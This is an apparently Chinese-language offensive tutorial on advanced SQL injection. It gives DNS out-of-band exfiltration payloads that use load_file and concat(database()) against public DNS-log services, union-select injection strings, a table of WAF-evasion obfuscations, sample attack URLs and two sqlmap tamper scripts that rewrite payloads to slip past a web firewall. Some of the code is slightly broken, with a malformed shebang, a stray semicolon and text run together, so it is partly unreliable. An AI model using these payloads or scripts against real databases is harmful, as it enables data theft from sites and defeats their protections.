SQL注入进阶
文章目录
- SQL注入进阶
- OOB注入
- OOB简介
- 关键点
- 原理
- 延时注入
- WAF绕过
- 字符替换
- SQLMAP定制
- 字符替换集合
- tamper脚本编写
- 字符替换tamper脚本
- WAF 绕过脚本
OOB注入
OOB简介
out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。
OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。
关键点
- 无回显
- DNS带外 (目标能上外网)
- DNS平台
- https://dnslog.cn
- http://ceye.io/profile
- https://dig.pm/
- DNS平台
原理
在没有回显的情况下可以使用DNS外带,在以上的网站中获取子域名,在子域名前加入执行的命令,如果目标机触发改dns解析时日志就会被传回到网站平台,这时就可以查看到没有回显的数据了
延时注入
利用以下代码可以触发解析
select load_file("\\\\准备好的dns\\请求的文件");
既然这样我们使用concat函数进行拼接就可以返回回显比直接进行延时输入降低了成本
and 1=1 union select 1,2,load_file(concat("\\\\",database();"请求的子域名\\文件名")) --+
WAF绕过
针对 Web 安全的防护,需要使用一款安全产品,Web 应用安全防火墙(web Application Firewall,WAF)攻防对抗:
防守方,根据 WAF 设备的报警及时进行拦截处理,应急响应,溯源反制等工作
攻击方,想尽办法绕过安全防护。
Bypass的主要目的:
- 已知漏洞存在的情况下绕过安全防护进行漏洞利用
- 免杀
- 绕过系统安全机制
字符替换
| 字符 | 绕过方法 |
|---|---|
| and | /!14400and/ |
| order by | //order//%0aa*/by// |
| union select | union/!88888cas/%a0//!=*/select/**/ |
| database() | database(/!//**%0fAJEST*/*/) |
| from information_schema.tables | /!from-- %0f/%0ainformation_schema.tables*/ |
| from information_schema.columns | /!from-- %0f/%0ainformation_schema.columns*/ |
| count(*) | count(1) |
绕过方法
直接进行字符替换
SQLMAP定制
字符替换集合
| 字符 | 代替字符 |
|---|---|
| –+ | and '1 |
| –+ | and ‘1’='1 |
| # | and’1 |
| # | and ‘1’='1 |
| and | anANDd |
| or | oORr |
| %a0 |
示例
?id=1'%a0aandnd%a01=2%a0union%a0select%a0database(),version(),3%a0aAND nd%a0'1?
id=1'%a0aandnd%a01=2%a0union%a0select%a01,database(),3%a0anandd%a01=' 1
%a0 在php版本5.2以下和linux中有效
tamper脚本编写
字符替换tamper脚本
!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):"""
"-- " and 1='1
# and 1='1
and aANDnd
or oORr
" " %A0
"""
payload = re.sub(r"(?i)-- ","and 1='1",payload)
payload = re.sub(r"(?i)#"," and '1'='1",payload)
payload = re.sub(r"(?i)and","aANDnd",payload)
payload = re.sub(r"(?i)or","oORr",payload)
payload = re.sub(r"(?i) ","%A0",payload)
return payloadWAF 绕过脚本
#!/usr/bin/env python
"""
Copyright (c) 2006-2023 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.HIGHEST
def dependencies():
pass
def tamper(payload, **kwargs):
"""
and /*!14400and*/
order by /**/order/*/%0a*a*/by/**/
union select
union all select
union/*!88888cas*//*/%0a*a*/select/**/database() database(/*!/*/**%0fAJEST*/*/)
from information_schema.schemata /*!from--
%0f/*%0ainformation_schema.schemata*/
from information_schema.tables /*!from--
%0f/*%0ainformation_schema.tables*/
from information_schema.columns /*!from--
%0f/*%0ainformation_schema.columns*/
"""
payload = re.sub(r"(?i)and", "/*!14400and*/", payload)
payload = re.sub(r"(?i)order by", "/**/order/*/%0a*a*/by/**/",
payload)
payload = re.sub(r"(?i)union select",
"union/*!88888cas*//*/%0a*a*/select/**/", payload)
payload = re.sub(r"(?i)union all select",
"union/*!88888cas*//*/%0a*a*/select/**/", payload)
payload = re.sub(r"(?i)from information_schema.schemata",
"/*!from--%0f/*%0ainformation_schema.schemata*/", payload)
payload = re.sub(r"(?i)from information_schema.tables",
"/*!from--%0f/*%0ainformation_schema.tables*/", payload)
payload = re.sub(r"(?i)from information_schema.columns",
"/*!from--%0f/*%0ainformation_schema.columns*/", payload)
payload = re.sub(r"(?i)database\(\)",
"database(/*!/*/**%0fAJEST*/*/)", payload)
payload = re.sub(r"(?i)count\(*\)","count(1)",payload)
payload = re.sub(r"(?i) as"," /*!14400as*/",payload)
payload = re.sub(r"(?i)char","/*!14400char*/",payload)
return payload
